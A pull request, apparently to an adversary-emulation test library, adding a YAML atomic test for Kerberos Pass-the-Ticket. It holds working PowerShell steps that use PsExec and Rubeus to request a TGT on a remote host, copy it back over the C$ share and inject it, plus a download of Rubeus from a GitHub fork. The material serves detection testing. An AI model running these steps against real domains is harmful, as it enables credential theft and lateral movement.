### PR TITLE
Extend T1550.003 with new PTT attack

### DIFF
--- a/atomics/T1550.003/T1550.003.yaml
+++ b/atomics/T1550.003/T1550.003.yaml
@@ -33,3 +33,67 @@ atomic_tests:
     command: |
       #{mimikatz_exe} "kerberos::ptt #{ticket}"
     name: command_prompt
+- name: Rubeus Kerberos Pass The Ticket
+  auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb
+  description: |
+    Requesting a TGT on a remote system and retrieving it locally before requesting a service ticket with it. This is a Pass-The-Ticket attack because the TGT is obtained on the remote system, then used from a different machine (local).
+    PsExec is used to execute commands on the remote system, and the "C$" admin share is used to retrieve the TGT, so the current user must have admin rights remotely and other PsExec prerequisites must be met.
+  supported_platforms:
+  - windows
+  input_arguments:
+    target:
+      description: Remote system to request the TGT from
+      type: string
+      default: localhost
+    user_name:
+      description: username associated with the ticket (privileged account not required)
+      type: String
+      default: Administrator
+    password:
+      description: password for user_name
+      type: String
+      default: Password
+    domain:
+      description: domain
+      type: String
+      default: atomic.local
+    rubeus_path:
+      description: Path of the Rubeus binary
+      type: Path
+      default: $env:TEMP\rubeus.exe
+    rubeus_url:
+      description: URL of Rubeus executable
+      type: Url
+      default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+    psexec_path:
+      description: Path of the PsExec binary
+      type: String
+      default: C:\PSTools\PsExec.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Rubeus must exist on disk at specified location (#{rubeus_path})
+    prereq_command: |
+      if (Test-Path #{rubeus_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path}
+  - description: |
+      PsExec must exist on disk at specified location (#{psexec_path})
+    prereq_command: |
+      if (Test-Path #{psexec_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
+      Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
+      New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
+      Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force
+  executor:
+    name: powershell
+    elevation_required: true 
+    command: |
+      #{psexec_path} -accepteula \\#{target} -w c:\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi
+      Set-Location $env:TEMP
+      Move-Item -Force "\\#{target}\c$\ticket.kirbi" ticket.kirbi
+      Write-Host "Successfully retrieved TGT from '#{target}', now requesting a TGS from local"
+      & "#{rubeus_path}" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt
+      Remove-Item $env:TEMP\ticket.kirbi
+      & "#{rubeus_path}" purge      

--- a/atomics/T1550.003/T1550.003.yaml
+++ b/atomics/T1550.003/T1550.003.yaml
@@ -56,11 +56,11 @@ atomic_tests:
     domain:
       description: domain
       type: String
-      default: atomic.local
+      default: $Env:USERDOMAIN
     rubeus_path:
       description: Path of the Rubeus binary
       type: Path
-      default: $env:TEMP\rubeus.exe
+      default: $Env:TEMP\rubeus.exe
     rubeus_url:
       description: URL of Rubeus executable
       type: Url


### PR DESCRIPTION
Hi,

**Details:**
This PR extends the T1550.003 atomic by adding a use case where a stolen TGT is reused on another system to request a TGS.
The ticket crafting/request is performed via Rubeus, while the initial TGT is crafted via PsExec on a remote host.

**Testing:**

Local testing

![art-part1](https://user-images.githubusercontent.com/6689144/144826153-d9f75148-42c9-4999-b5b3-3bd132134a35.png)

![art-part2](https://user-images.githubusercontent.com/6689144/144826204-78f9e47b-09f2-462f-a0d4-8f75ec52746e.png)